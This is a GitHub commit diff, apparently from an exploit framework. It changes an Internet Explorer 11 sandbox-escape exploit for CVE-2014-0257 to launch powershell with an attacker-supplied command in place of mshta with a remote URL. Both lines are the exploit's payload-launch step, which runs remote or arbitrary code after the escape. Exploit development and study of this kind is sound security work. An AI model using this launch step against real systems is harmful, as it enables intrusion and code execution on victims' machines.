We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 43699b1 commit 443f9f1Copy full SHA for 443f9f1
external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp
@@ -165,8 +165,8 @@ void DoDfsvcExploit()
165
{
166
std::vector<variant_t> startArgs;
167
168
- startArgs.push_back(L"mshta");
169
- startArgs.push_back(GetEnv(L"MYURL"));
+ startArgs.push_back(L"powershell");
+ startArgs.push_back(GetEnv(L"PSHCMD"));
170
171
ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
172
}
0 commit comments